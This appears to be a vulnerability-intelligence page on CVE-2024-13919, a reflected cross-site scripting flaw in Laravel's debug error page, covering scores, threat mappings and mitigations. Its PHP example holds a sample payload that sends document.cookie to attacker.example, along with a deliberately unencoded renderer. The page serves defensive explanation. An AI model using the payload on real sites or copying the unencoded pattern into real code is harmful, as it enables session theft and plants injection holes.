Cyber Resilience

CVE-2024-13919

Severity: High · Public PoC
Published: 10 March 2025
Modified: 24 March 2025
KEV Added: not listed
Patch: available (Laravel framework 11.36.0 or later)
CVSS Score v3.1: 8.0 (High), vector CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N
EPSS Score: 0.0035 (57.5th percentile)
Risk Priority: 16 (weighting 60% EPSS · 20% KEV · 20% CVSS)

Summary

CVE-2024-13919 is a high-severity reflected cross-site scripting (CWE-79) vulnerability in the Laravel Framework. Its CVSS v3.1 base score is 8.0 (High).

Operationally, exploitation maps to the MITRE ATT&CK technique Spearphishing Link (T1566.002), since a victim must be lured to a crafted URL. The CVE ranks in the top 42.5% of CVEs by EPSS exploit likelihood, is not currently listed in the CISA KEV catalog, and has a public proof-of-concept referenced.

The strongest mitigations our analysis identified are NIST 800-53 SI-11 (Error Handling) and SI-15 (Information Output Filtering).

Deeper analysis

CVE-2024-13919 is a reflected cross-site scripting (XSS) vulnerability in the Laravel framework, versions 11.9.0 through 11.35.1. The debug-mode error page displays the request's route parameters without HTML-encoding them, so an attacker-controlled parameter value is emitted into the page as markup and any script it carries executes. It carries a CVSS v3.1 base score of 8.0 (AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N) and maps to CWE-79.

An unauthenticated remote attacker exploits it by tricking a user into opening a specially crafted URL that triggers the debug error page. The unencoded route parameter reflects the attacker's payload, and the script runs in the victim's browser under the application's origin, with high confidentiality and integrity impact (session hijacking, data theft). Two preconditions limit it: the victim must interact (UI:R), and the application must be running with debug mode enabled, because the vulnerable page is not rendered when debug mode is off; the vector records this as high attack complexity (AC:H).

Mitigation is to upgrade to Laravel framework 11.36.0 or later, which contains the fix from GitHub pull request #53869. As an interim measure and as general hardening, keep debug mode disabled in production (APP_DEBUG=false), which removes the debug error page from the exposed surface; this does not replace the upgrade. Further details are provided in the SBA Research advisory on GitHub and the oss-security mailing list announcement.
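The unencoded-output pattern and its encoded counterpart side by side, as an added PHP example: this is not Laravel's own code and not the change made in pull request #53869. The renderer functions, the h() helper, the APP_DEBUG argument and the sample payload are assumptions made for the illustration; the framework facts it relies on are that Blade's {{ }} syntax escapes through e(), which is built on htmlspecialchars(), while {!! !!} emits the value raw, and that the debug error page is only rendered when debug mode is on.

```php
<?php
// Added example (not Laravel's own code): a minimal stand-in for a debug-mode
// error page that echoes the request's route parameters, first in the
// vulnerable form and then with HTML output encoding applied. The function
// names, the $appDebug flag and the sample payload are assumptions made for
// this illustration.
declare(strict_types=1);

// Constructed sample: parameters as a router would bind them from a crafted
// URL hitting a route like /users/{id}. The value is a reflected-XSS payload.
$routeParameters = [
    'id' => '"><script>document.location="https://attacker.example/?c="+document.cookie</script>',
];

// VULNERABLE: the parameter is concatenated into markup without encoding.
// Blade's unescaped {!! $value !!} syntax behaves the same way.
function render_debug_page_vulnerable(array $params): string
{
    $rows = '';
    foreach ($params as $name => $value) {
        $rows .= "<tr><td>{$name}</td><td>{$value}</td></tr>\n";
    }
    return "<h1>Debug: route parameters</h1>\n<table>\n{$rows}</table>\n";
}

// HTML-encode a string for use as element text or inside a quoted attribute.
// Blade's escaped {{ $value }} syntax goes through e(), which is built on
// this same htmlspecialchars() call.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// HARDENED: every untrusted fragment (keys included) is encoded before it is
// placed into the page. Values are cast to string first so the typed encoder
// always receives a string, whatever the router bound.
function render_debug_page_hardened(array $params): string
{
    $rows = '';
    foreach ($params as $name => $value) {
        $rows .= '<tr><td>' . h((string) $name) . '</td><td>' . h((string) $value) . "</td></tr>\n";
    }
    return "<h1>Debug: route parameters</h1>\n<table>\n{$rows}</table>\n";
}

// Defence in depth: the debug renderer is only reachable when debug mode is
// on; production (APP_DEBUG=false) gets a generic page carrying no request data.
function render_error_page(array $params, bool $appDebug): string
{
    if (! $appDebug) {
        return "<h1>Server Error</h1>\n";
    }
    return render_debug_page_hardened($params);
}

// Small self-check so the script fails loudly if the encoding is wrong.
function check(bool $condition, string $message): void
{
    if (! $condition) {
        throw new RuntimeException($message);
    }
}

$vulnerable = render_debug_page_vulnerable($routeParameters);
$hardened   = render_error_page($routeParameters, true);
$production = render_error_page($routeParameters, false);

check(str_contains($vulnerable, '<script>'), 'vulnerable page should carry a live script tag');
check(! str_contains($hardened, '<script>'), 'hardened page must not carry a live script tag');
check(str_contains($hardened, '&lt;script&gt;'), 'hardened page should show the payload as inert text');
check(! str_contains($production, 'attacker.example'), 'production page must not echo request data');

echo $hardened;
```

Run it with `php example.php` (PHP 8.0 or later for str_contains()); the vulnerable function is kept only to show the failing pattern and should never be reachable in a real application. The point of render_error_page() is that fixing the encoding and keeping debug mode off in production are independent layers: the upgrade removes the flaw, the configuration removes the page.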

Vulnerability details

The Laravel framework versions between 11.9.0 and 11.35.1 are susceptible to reflected cross-site scripting due to an improper encoding of route parameters in the debug-mode error page.

CWE(s)

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Related Threats

MITRE ATT&CK Enterprise Techniques (AI mapping)

T1566.002 Spearphishing Link (tactic: Initial Access)
Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems.
T1185 Browser Session Hijacking (tactic: Collection)
Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user behaviors, and intercept information as part of various browser session hijacking techniques.
Why these techniques?

Because the payload travels in a crafted URL, it is delivered to the victim as a link, which matches spearphishing link delivery (T1566.002). Once the reflected script runs in the victim's browser it can hijack the session or steal cookies and page data, the impacts covered by browser session hijacking (T1185).

Confidence: MEDIUM · MITRE ATT&CK Enterprise v19.0

CVEs Like This One

CVE-2024-13918 (same product: Laravel Framework)
CVE-2025-27515 (same product: Laravel Framework)
CVE-2025-23547 (shared CWE-79)
CVE-2024-47002 (shared CWE-79)
CVE-2025-67978 (shared CWE-79)
CVE-2025-22498 (shared CWE-79)
CVE-2025-23904 (shared CWE-79)
CVE-2025-22754 (shared CWE-79)
CVE-2025-22682 (shared CWE-79)
CVE-2025-23593 (shared CWE-79)

Affected Assets

laravel/framework, versions 11.9.0 through 11.35.1 (fixed in 11.36.0)

Mitigating Controls (NIST 800-53 r5) (AI mapping)

SI-15 Information Output Filtering (prevent): mandates output filtering and encoding of route parameters on the debug error page, directly preventing reflected script execution.

SI-11 Error Handling (prevent): ensures that error handling on debug-mode pages does not reflect unencoded user input.

Patching (prevent): requires identification, reporting, and correction of the encoding flaw by upgrading to Laravel 11.36.0 or later.
